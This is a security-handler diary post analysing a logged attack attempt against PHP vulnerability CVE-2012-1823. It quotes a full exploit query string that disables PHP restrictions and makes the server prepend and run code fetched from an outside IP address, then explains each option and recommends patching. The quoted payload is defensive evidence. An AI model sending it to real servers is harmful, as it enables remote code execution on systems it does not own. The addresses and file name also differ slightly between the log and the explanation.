Reader Bob detected in his webserver the following string in the access log of his web server:
bas1-richmondhill34-1177669777.dsl.bell.ca - - [24/May/2012:12:17:49 -0700] GET /index.php?-dsafe_mode%3dOff+-ddisable_functions%3dNULL+-dallow_url_fopen%3dOn+-dallow_url_include%3dOn+-dauto_prepend_file%3dhttp%3A%2F%2F188.8.131.52%2Finfo3.txt HTTP/1.1 404 2890 - .NET CLR 1.0.2914)
This string is an attempt to exploit the PHP vulnerability CVE-2012-1823 with the remote execution variant. Let's see what means each of the options invoked:
safe_mode=off: PHP disables the capacity of checking if the if the owner of the current script matches the owner of the file to be operated by a file funcionality. This directive has been deprecated on PHP 5.3.0 tree and removed on PHP 5.4.0 tree.
disable_functions=null: No function is disabled from the whole amount contained within PHP. This means that insecure functions are available like proc_open, exec, passthru, curl_exec, system, popen, curl_multi_exec and shell_exec. For more information on this functions, please check the PHP manual.
allow_url_fopen=on: This directive allows PHP to open files located in http or ftp locations and operate them as a normal file descriptor.
allow_url_include=on:This directive allows to include additional PHP code located in a http or ftp URL into the PHP file before being processed and executed.
auto_prepend_file=http://184.108.40.206/info3.php: This directive includes the PHP code located in http://220.127.116.11/info3.php and execute it before the code inside index.php.
You can prevent this by using the latest stable PHP version located at the downloads page. If you are using windows, please be careful because you can be affected by the CVE-2012-2376. For more information regarding remediation on this vulnerability, please check my previous diary about it.
Have you seen such logs in your access.log webserver file? We want to hear about it. Let us know!
Manuel Humberto Santander Pelez
SANS Internet Storm Center - Handler
e-mail:msantand at isc dot sans dot org
(c) SANS Internet Storm Center. http://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.